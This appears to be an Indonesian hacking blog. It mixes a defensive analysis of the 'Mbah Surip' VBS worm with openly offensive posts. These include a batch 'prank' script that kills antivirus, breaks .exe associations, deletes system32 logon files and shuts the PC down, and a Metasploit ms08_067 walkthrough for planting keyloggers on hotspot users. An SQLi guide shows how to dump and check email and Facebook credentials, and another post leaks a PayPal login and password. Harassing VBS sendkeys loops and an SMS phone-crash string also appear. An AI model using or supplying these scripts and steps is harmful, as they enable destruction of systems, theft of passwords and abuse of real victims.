-->
Welcome To Team Hacker This Blog Created By Ryan Cracker Dont Forget To Follow Or Coments My Entri's

Thursday, January 5, 2012

Virus Mbah Surip - Cara kerja dan penanggulangannya

Setelah dihebohkan dengan dengan virus MJ alias Michael Jackson, baru-baru ini beredar juga virus lokal dengan nama Virus "Mbah Surip"
Virus ini buatan anak negeri dengan menggunakan bahasa pemrograman Visual Basic ( VBS )
Meskipun hanya menggunakan VBS tapi virus ini cukup merepotkan.

Penyanyi lagu 'Tak Gendong' itu akan muncul pertama kali ketika komputer yang telah terinfeksi memasuki Internet Explorer. Dengan demikian, korban selanjutnya akan disusupi folder bernama 'Album Bokep' di setiap drive maupun flash disk yang isinya seakan-akan file film porno. Namun folder 'panas' itu sebenarnya merupakan file virus yang siap 'menggendong' komputer Anda bila dijalankan.

Bagaimana Virus Mbah Surip bekerja


File induk VBS/Cryf.A ini mempunyai nama [drvconfg.drv] dengan ukuran file sebesar 218 KB, file ini mempunyai ekstensi [.drv] dan mempunyai type file sebagai 'device driver', file ini akan di enkipsi sehingga kode virusnya tidak mudah di baca.

Pada saat file virus dijalankan, pertama kali yang akan di lakukan adalah memanggil file [svchost.vbs] yang sudah dienkript yang berada di direktori [%Driver%:\Recycled\S-1-5-21-343818398-18970151121-842a92511246-500\Thumbs.db]. Kemudian file [svchost.vbs] ini akan menjalankan file utama virus yakni file [drvconfg.drv], file inilah yang berisi runtime untuk menginfeksi dan menanamkan aksi-aksi lain nya di dalam komputer target.

Pada saat user menjalankan dirinya, VBS/Cryf.A akan memanggil program [Windows Media Player]. Kemudian akan membuat beberapa file induk yang salah satunya akan dijalankan saat komputer dinyalakan.

Sementara untuk mempertahankan eksistensinya, ia akan mencoba untuk blok beberapa fungsi windows seperti: Task Manager, Regedit, CMD, MSCONFIG, hingga tidak dapat merubah Wallpaper

Selain itu, virus ini juga akan menyembunyikan file tersebut [regedit.exe, tskmgr.exe. cmd.exe dan MSConfig.exe] dan sebagai gantinya ia akan membuat file yang sama. Bedanya, ia akan mempunyai dua ekstensi yakni [.exe.lnk], antara file 'gadungan' dan file asli akan mempunyai icon yang sama. Jika user mencoba untuk memanggil salah satu fungsi Windows tersebut maka akan muncul pesan error.

Tetapi jika user mencoba untuk langsung menjalankan file 'gadungan' yang telah dibuat oleh virus sebagai pengganti file asli yang telah disembunyikan [contoh: regedit.exe.lnk] maka secara otomatis akan menjalankan file virus yang berada di direktori [C:\WINDOWS\system32\svchost.dls].

Tak hanya itu, ia juga akan melakukan Debugger terhadap ketiga fungsi windows tersebut untuk menjalankan file virus [C:\WINDOWS\appsys.exe] dengan membuat string pada registry.

Beberapa tools security khususnya antivirus lokal seperti PCMAV atau ANSAV. VBS/Cryf.A juga akan melakukan Debugger terhadap program yang telah ditentukan dengan membuat string.

Virus ini juga akan mencoba untuk mengaktifkan dirinya secara otomatis dengan menjalankan file [C:\windows\system\svchost.exe atau C:\windows\WinUpdt.scx] setiap kali user menjalankan file yang mempunyai ekstensi berikut: .reg, .vbs, dan .inf.


Penanggulangan virus Mbah Surip :

Vaksincom yang membuat ramuan untuk memberantas virus ini ( detikcom )

1. Matikan proses virus yang sedang aktif di memori. Untuk mematikan proses virus ini silahkan gunakan tools pengganti task manager seperti Currproses, kemudian matikan proses yang mempunyai product name 'Microsoft ® Windows Script Hosta' dengan cara:

Pilih [blok] proses yang mempunyai product name 'Microsoft ® Windows Script Hosta'
Klik kanan pada proses yang sudah di blok
Pilih [Kill Selected Processes]


2. Blok agar file virus tidak dapat dijalankan untuk sementara selama proses pembersihan dengan menggunakan fitur 'Software Restriction Policiesa', fitur ini hanya ada di Windows XP/2003/Vista/2008. Untuk blok file tesebut lakukan langkah berikut:

Klik menu [Start]
Klik [Run]
Pada dialog box [Run], ketik SECPOL.MSC kemudian klik tombol [OK]
Pada layar [Local Security Policy], klik [Software restriction policies]
Klik kanan pada [software restriction policies] dan pilih [Create new policies]
Kemudian klik kanan di [Additional Rule], dan pilih [New Hash Rule].
Di Kolom [File Hash], klik tombol [Browse] dan pilih file yang akan diblok. Pada kolom [File information] akan terisi informasi dari file tersebut secara otomatis.
* Pada Security Level pilih [Disallowed]
* Pada kolom 'descriptiona' isi deskripsi dari nama file tersebut (bebas),

3. Fix Registry dengan menjalankan file [FixRegistry.exe], silahkan download dsini
4. Hapus file induk virus yang telah dibuat. File induk virus ini akan disembunyikan. Jika file induk tersebut tidak dapat ditampilkan silahkan gunakan tools penggganti Windows Explorer seperti 'Explorer XP'. Silahkan download di alamat berikut:
http://www.explorerxp.com/explorerxpsetup.exe

Setelah software tersebut di install, cari dan hapus file berikut: svchost.vbs, desktop.ini, drvconfg.drv. SHELL32.dll, %Drive%:\Album BOKEP\Naughty America dan C:\windows.

5. Tampilkan file [TaskMgr.exe/Regedt32.exe/Regedit.exe/CMD.exe/Logoff.exe] yang disembunyikan oleh virus, caranya:

Klik menu [Start]
Klik [Run]
Ketik CMD kemudian klik tombol [OK]
Pada layar 'Dos Prompt' pindahkan posisi kursor ke drive yang akan di periksa
Ketik perintah ATTRIB regedit.exe kemudian klik tombol
Kemudian ketik perintah saya yang membedakan hanya nama file yang akan ditampilkan yakni Taskmgr.exe, cmd.exe dan Logoff.exe

6. Untuk pembersihan optimal dan mencegah infeksi ulang silahkan install dan scan dengan antivirus yang up-to-date.

7. Jika komputer sudah benar-benar bersih dari virus, hapus rule blok file [WSCript.exe] yang telah dibuat pada langkah nomor 2, caranya:

Klik menu [Start]
Klik [Run]
Pada dialog box [Run], ketik SECPOL.MSC kemudian klik tombol [OK]
Pada layar [Local Security Policy], klik 2x [Software restriction policies]
Klik [Additional Rule]
Hapus Rule yang pernah Anda buat sebelumnya
Read more »

cara membuat virus HP

VIRUS untuk handphone/hp, bukan VIRUS TROJAN, WAlLWARE. kenapa VIRUS yang saya buat bukan untuk komputer / PC Melainkan untuk handphone?
Nah ... Sekarang saya akan membagikan ilmu tentang cara membuat VIRUS untuk Hp, sebelumnya pernahkah anda mendapat SMS ketika anda membuka SMS tersebut dan menekan arah bawah maka handphone anda akan secara otomatis akan mati, namun VIRUS ini tidak berbahaya, silahkan copy code virus ini dan kirim ke handphone anda melalui sistem pengiriman SMS melalui internet, seperti yahoo, dll, sebenarnya di blog saya dulu ada sistem pengiriman pesan melalui internet ke Hp tetapi sudah saya hapus, karena saya tidak ingin program ini di pakai untuk menipu! Silahkan copy codedi bawah, ini type SMS yang harus anda kirim, kata-kata yang di atas bisa di ubah, tetapi jangan hapus code dan tanda enternya!
Silahkan copy dari bawah sini!


JANGAN TEKAN ARAH BAWAH, INI BUKAN SMS BIASA











_¯_¯_¯_¯ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_0


Jika Abng Bingung, download Contoh virusnya http://www.ziddu.com/download/10566145/V...s.txt.html

terus pindah ke handphone anda

Nah ingat, virus ini hanya mematikan handphone teman yang di kirimi anda sms, sebenarnya program ini bisa disebut Virus tetapi saya lebih senang menyebutnya program meNON AKTIFKAN handphone tanpa menekan tombol tunoff pada hp!
Cara mengaktifkan hp kembali, anda hanya perlu mengaktifkanya kembali, tetapi virus ini hanya aktif pada handphone yang tidak memiliki pasilitas HSDP, HSDPA, yang tentunya pada hp yang tidak ada antivirusnya, minimal handphone yang gak ada cameranya,
Nah silahkan mencoba!
Read more »

[Hack] Paypal Akun

Id = 1
Email = vvserve@mail7.ph
Password = ao164082
Balance = -
Status = Verified
Ip Login = 71.67.97.132
Country = Japan
Type = Personal
Credit Card = Y
Read more »

script jail BOKK !

save script berikut di notepad dan simpan sebagai "jail.vbs" tanpa koma terbalik. Dan siap menjaili orang...
hehhehehe

[code] Set wshshell = wscript.CreateObject("WScript.Shell")

Wshshell.run "notepad"

do

wscript.sleep 400

wshshell.sendkeys "Hi, "

wscript.sleep 400

wshshell.sendkeys "My "

wscript.sleep 400

wshshell.sendkeys "name "

wscript.sleep 200

wshshell.sendkeys "is "

wscript.sleep 400

wshshell.sendkeys "K4ZU "

wscript.sleep 400

wshshell.sendkeys "K4ZU"

wscript.sleep 400

wshshell.sendkeys "If "

wscript.sleep 200

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "don't "

wscript.sleep 400

wshshell.sendkeys "know "

wscript.sleep 400

wshshell.sendkeys "me "

wscript.sleep 400

wshshell.sendkeys "then "

wscript.sleep 400

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "know "

wscript.sleep 400

wshshell.sendkeys "nobody "

wscript.sleep 200

wshshell.sendkeys "Common, "

wscript.sleep 400

wshshell.sendkeys "man "

wscript.sleep 400

wshshell.sendkeys "you "

wscript.sleep 400

wshshell.sendkeys "must "

wscript.sleep 400

wshshell.sendkeys "know me. "

wscript.sleep 400

wshshell.sendkeys "Hahahaha! "

wscript.sleep 400

wshshell.sendkeys "I "

wscript.sleep 400

wshshell.sendkeys "am "

wscript.sleep 400

wshshell.sendkeys "so "

wscript.sleep 400

wshshell.sendkeys "much "

wscript.sleep 4000

wshshell.sendkeys "fun. "

wscript.sleep 400

wshshell.sendkeys "Well, "

wscript.sleep 400

wshshell.sendkeys "my "

wscript.sleep 400

wshshell.sendkeys "heart "

wscript.sleep 400

wshshell.sendkeys "is "

wscript.sleep 400

wshshell.sendkeys "melting, "

wscript.sleep 400

wshshell.sendkeys "now "

wscript.sleep 400

wshshell.sendkeys "don't "

wscript.sleep 400

wshshell.sendkeys "cry! "

wscript.sleep 400

wshshell.sendkeys "okay! "

wscript.sleep 400

wshshell.sendkeys "Okay! "

wscript.sleep 400

wshshell.sendkeys "I'll "

wscript.sleep 400

wshshell.sendkeys "stop "

wscript.sleep 400

wshshell.sendkeys "this. "

loop


Catatan: Untuk Hentikan buka saja Task Manajer dan End proses "wscript.exe"
Read more »

Pasang Keylogger Tanpa Nyentuh Komputer Tujuan

Peralatannya adalah :

Angry IP Scanner (Buat scanning ipaddress)

Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)

Metasploit (Sangat penting buat exploitnya)

1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee...lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :

[Image: 162750_1401465651775_1686336794_811864_4285701_n.jpg]

nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:
[Image: 148101_1401466691801_1686336794_811866_4956455_n.jpg]



liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh....sampe keakar2nya bikin intall ulang dalem hitungan detik...Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa...lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik ?msfgui? setelah kebuka dan Start, pilih ?ms08_067_netapi? di Exploit>windows>smb> , seperti gambar berikut ini:

[Image: 148893_1401467211814_1686336794_811869_3285451_n.jpg]

4. Maka akan keluar jendela pilihan OS targetnya, pilihlah ?Automatic Targeting?, seperti gambar berikut ini:

[Image: 76876_1401468051835_1686336794_811872_7263103_n.jpg]

5. Lalu scrool kebawah dan pilih ?Meterpreter>bind_tcp? , seperti gambar berikut ini:

[Image: 154307_1401469531872_1686336794_811874_6222778_n.jpg]

6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom ?RHOST? , seperti gambar berikut ini:

[Image: 162941_1401470211889_1686336794_811876_4124129_n.jpg]

Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab ?Session?, seperti gambar dibawah ini:
[Image: 76083_1401470611899_1686336794_811877_2465812_n.jpg]
8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:
[Image: 150267_1401470891906_1686336794_811878_1152151_n.jpg]

9. Maka akan keluar path tempat penyimpanan log nya berupa format ?txt? dikomputer kita, seperti gambar berikut ini:

[Image: 156342_1401471091911_1686336794_811879_6514333_n.jpg]

coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:

[Image: 162636_1401471851930_1686336794_811882_7988551_n.jpg]

10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:
[Image: 148098_1401489772378_1686336794_811897_3877593_n.jpg]

Maaf yaa ga bisa kasih bahan2nya. di mbah google banyak kok
Read more »

download di uplodic tanpa menunggu

Bagaimana Cara Downloads Di uploadic ??
-Pilih Yang Free

-Masukan Code Linknya , dan click downloads ,

-Lalu Klik Link nya, ,





GAK Mau Nunggu 9 Menit???

Cara nya apabila anda punya accountnya ,tinggal login saja dah & Downloads tanpa menunggu 9 menit
Caranya

Buat Account nya dulu , Lihat Di sini sob
Isi Formulir pendaftaran

-Username
-Email
-Password
-Retype password
-payment Info (Pakai paypal/Alert pay)
-Kalau membuatnya cuma ingin agar downloads di uploadic tanpa menunggu9 menit
payment info di isi terserah/ngarang ja juga isa sob,,,
-Code

3.Lalu Save


tara Jadi dah,,

Loe download pakai uploadic tanpa menunggu 9 menit,,,
Read more »

[POC] Hack Email/Facebook

cara ini beda sama saat saya hack facebook yang pake software bruteforce... kali ini saya pake methode SQLi..

Langsung aja Check it out

dork : inurl:index.php?id= site:uk email

saya nyarinya di BING...

dan bla... bla... bla...

sampe sini saya yakin smuanya udah ngerti SQLi...
klo blom coba cari" aja di thread

coba mas" skalian cari coloum dimana ada email dan passwordnya

"wah sama kayak cari db untuk scan paypal dong..."

iya bener tuh

klo udah di dump skarang pergi ke sini http://tools.checkccv.com/checkmailnolimit

trus kopas hasil dump nya ke situ
klo passwordnya masih berupa MD5 yaaa.. harus di crack dlu

sesuaikan posisi email:pass dengan nomor dibawahnya
trus klo mau check facebook skalian klik checklist aja yang bacaan "Check Facebook"

trus klik CHECK deh
Read more »

Saturday, October 1, 2011

Script Cabe Rawit yang bikin jahil

ebelumnya aku minta izin ama temanku shafry karena udah minjam script dia untuk bikin artikel…
he he he he
neh script yang dimaksud…
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown -s -t 5 -c “thank you for waiting”
Read more »

Hack keyboard sehingga korban dipaksa mengetik " You are a gay" secara simultan

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a gay"
loop
Read more »

Menyalakan tombol Caps lock secara simultan

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Read more »